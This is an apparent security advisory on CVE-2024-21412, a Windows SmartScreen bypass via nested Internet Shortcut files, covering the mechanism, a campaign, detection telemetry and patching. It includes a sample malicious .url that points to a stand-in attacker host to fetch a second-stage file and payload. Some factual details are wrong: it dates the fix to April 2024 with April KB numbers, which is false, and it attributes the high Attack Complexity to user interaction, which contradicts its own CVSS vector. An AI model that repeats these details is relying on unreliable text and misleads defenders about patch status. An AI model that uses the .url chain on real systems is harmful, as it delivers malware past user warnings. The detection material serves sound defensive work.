CVE-2024-21412: SmartScreen Bypass via Internet Shortcut Files

CVE-2024-21412, CVSS v3.1 base score 8.1 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H), is a Mark of the Web zone trust re-evaluation failure in the Windows shell’s Internet Shortcut handler. Affected surface: Windows 10 1809 through 23H2, Windows 11 21H2 through 24H2. The vulnerability delivers arbitrary code execution without triggering SmartScreen. One user interaction — opening a .url file — completes the chain.

The bug lives in how the shell propagates zone trust across nested Internet Shortcut resolution. When a .url file contains a URL= field pointing to a UNC path (file:// or \\server\share\), Windows resolves the nested resource from the remote host but does not independently evaluate that resource against SmartScreen zone policy. The outer .url file’s trust classification propagates to the nested target without re-evaluation. An attacker serving a second-stage .url from a controlled SMB or WebDAV endpoint can deliver an executable — .exe, .msi, .cpl — that Windows treats as implicitly trusted by inheritance from the outer file’s zone context. Exploit primitive: trust boundary bypass via nested URL moniker resolution. The shell’s zone propagation logic is the entire attack surface. No UAF. No heap spray. No type confusion.

A representative first-stage .url:

[InternetShortcut]
URL=file://attacker.example.com/share/stage2.url
IconFile=https://trusted-domain.com/favicon.ico

The shell resolves stage2.url from the attacker’s WebDAV or SMB server. SmartScreen evaluates the outer file’s zone trust only. stage2.url is never independently checked. stage2.url then references the final payload. Payload executes without a SmartScreen prompt. No macro enablement, no script injection, no UAC bypass required. Attack Complexity is rated High due to the requirement for a user to open the crafted file — not because weaponization presents any technical barrier.

MITRE ATT&CK: T1566.002 (Spearphishing Link), T1218 (System Binary Proxy Execution), T1071.002 (Application Layer Protocol: SMB/Windows Admin Shares for C2 staging).

Zero-day exploitation documented by Trend Micro in February 2024. Attributed to Water Hydra (DarkCasino). Campaign targeted forex traders via compromised trading forums. Delivery mechanism: direct download links posted as trading tool archives in forum threads, bypassing email gateway inspection entirely. Lure themes: JPMorgan trading platform updates, forex signal tools. Final payload: DarkMe RAT — remote access trojan with keylogging and lateral movement capabilities. The two-stage .url chain was hosted on attacker-controlled infrastructure. No email attachment. No malicious document. Forum post to RAT installation in one click.

At .url resolution time, explorer.exe creates no child process. The Sysmon EID 1 of interest fires 30–60 seconds later when the stage-two payload executes: ParentImage: explorer.exe, Image path in %TEMP%, %APPDATA%, or another user-writable directory. That deferred process creation is the primary host-based detection window. Network telemetry is the earlier signal: outbound SMB (TCP 445) or WebDAV (TCP 80/443) from user context immediately following .url file open, sourced from svchost.exe hosting the WebClient service (WebDAV path) or the System process (SMB path), preceded by a DNS query for the attacker domain. The full detection surface is anomalous outbound SMB/WebDAV from a user context to an external IP within seconds of a .url open event, correlated with a Sysmon EID 1 firing to a user-writable path shortly after. No Windows Security EID 4688 at parse time. No Sysmon EID 10. No LSASS interaction. No PowerShell, WMI, or scripting engine invocation during the initial stage. Low-fidelity EDR rulesets that classify the deferred Sysmon EID 1 as benign miss the window entirely.

Fixed in Microsoft’s April 9, 2024 Patch Tuesday: KB5036892 (Windows 10 1809–23H2), KB5036893 (Windows 11 21H2–22H2), KB5036980 (Windows 11 23H2). KB articles and build mappings sourced from the Microsoft Security Update Guide for CVE-2024-21412. Post-patch, Windows evaluates MotW zone trust on nested .url targets independently. A .url resolving to a UNC path now triggers SmartScreen evaluation on the resolved resource before execution proceeds. The bypass chain breaks at the re-evaluation step. Residual exposure is limited to systems on extended patching cycles or with Windows Update disabled. No AppLocker rule, SRP policy, or group policy configuration fully eliminates the attack surface on unpatched builds.

This is a delivery primitive. Not privilege escalation. Not a sandbox escape. It removes the primary user-facing friction in phishing campaigns — the SmartScreen warning — using legitimate Windows shell functionality. The fix is the patch. The detection is network telemetry correlated with deferred process creation.